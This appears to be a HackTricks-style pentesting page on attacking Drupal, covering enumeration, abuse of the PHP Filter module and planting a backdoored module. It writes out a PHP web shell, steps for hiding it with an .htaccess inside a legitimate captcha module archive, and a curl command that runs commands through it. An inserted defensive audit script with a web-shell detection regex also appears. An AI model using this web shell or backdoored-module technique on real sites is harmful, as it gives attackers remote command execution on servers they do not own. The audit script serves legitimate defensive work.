Drupal

Last updated 7 months ago

Introduction


Enumeration


Footprinting:

curl -s http://<url> | grep Drupal

Version Enumeration:

curl -s http://<url>/CHANGELOG.txt | grep -m2 ""
  • Would not work on later versions of Drupal.

Automated Scan:

droopescan:

droopescan scan drupal --url http://<url>

Attacking Drupal


Requires admin access.

PHP Filter Module:

Before version 8:

It is possible to log in as admin and enable the PHP Filter module, which allows embedded PHP code to be executed.

  • Enable it under Modules, then save the configuration.

Then we can create a new page under Content, and place our web shell code:

system($_GET['cmd']);
  • Then visit the PHP page with ?cmd=<command>

  • Make sure the Text format drop-down is set to PHP Code.

After version 8:

We would have to install the module ourselves by uploading the module archive.

https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

Uploading a Backdoored Module:

Download and extract a normal module:

wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz

Create a PHP web shell:

<?php
system($_GET['fe8edbabc5c5c9b7b764504cd22b17af']);
?>

Create a .htaccess file:

By default, Drupal does not allow direct access to the /modules folder.

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

Move the files into the module folder and create an archive:

mv shell.php .htaccess captcha
tar czvf captcha.tar.gz captcha/
  • Then install this new module on Drupal.

Executing the web shell:

curl -s "<url>/modules/captcha/shell.php?fe8edbabc5c5c9b7b764504cd22b17af=id"
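
Seen from the defender's side, the backdoored module above leaves two artifacts on disk: a .htaccess inside a module folder and a PHP file that passes request input to a command-execution function. The audit below is an added example, not part of the original guide; the function names, the regex heuristic and the sample tree are constructed for illustration.

```sh
#!/bin/sh
# Added example (not from the original guide): audit a Drupal modules tree for
# the two on-disk artifacts of the backdoored-module upload described above.
# Function names and the sample tree are constructed for illustration.

# Heuristic: request input passed straight into a command-execution function.
SHELL_RE='(system|exec|passthru|shell_exec|popen|proc_open)[[:space:]]*\([^)]*\$_(GET|POST|REQUEST|COOKIE)'

# Print one finding per line as "<TYPE> <path>".
audit_modules() {
    # A module rarely ships its own .htaccess; one here can override the
    # access rules Drupal applies to the modules folder.
    find "$1" -type f -name '.htaccess' | sort | sed 's/^/HTACCESS /'
    # PHP-bearing files whose content matches the web shell heuristic.
    find "$1" -type f \( -name '*.php' -o -name '*.module' -o -name '*.inc' \) \
        -exec grep -lE "$SHELL_RE" {} + 2>/dev/null | sort | sed 's/^/WEBSHELL /'
    return 0
}

# Build a constructed sample tree: one clean module, one tampered module.
make_sample_tree() {
    sample_root="$(mktemp -d)"
    mkdir -p "$sample_root/modules/views" "$sample_root/modules/captcha"
    printf '<?php\nfunction views_help() { return "help"; }\n' \
        > "$sample_root/modules/views/views.module"
    printf '<?php\nsystem($_GET["k"]);\n' \
        > "$sample_root/modules/captcha/shell.php"
    printf '<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteBase /\n</IfModule>\n' \
        > "$sample_root/modules/captcha/.htaccess"
    printf '%s\n' "$sample_root"
}

# Run the audit against the constructed tree, then clean up.
demo_root="$(make_sample_tree)"
audit_modules "$demo_root/modules"
rm -rf "$demo_root"
```

On a real host, point audit_modules at the site's modules directory and compare any hit against the module's upstream release archive before acting on it.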

Known Vulnerabilities:

  • Versions 7.0 up to 7.31 - CVE-2014-3704 (Drupalgeddon) Pre-auth SQL injection

  • Versions 7.58 to 8.5 - CVE-2018-7600 (Drupalgeddon2) Remote Code Execution

  • Multiple versions of 7.x and 8.x - CVE-2018-7602 (Drupalgeddon3) Remote Code Execution

Drupal | HackTricks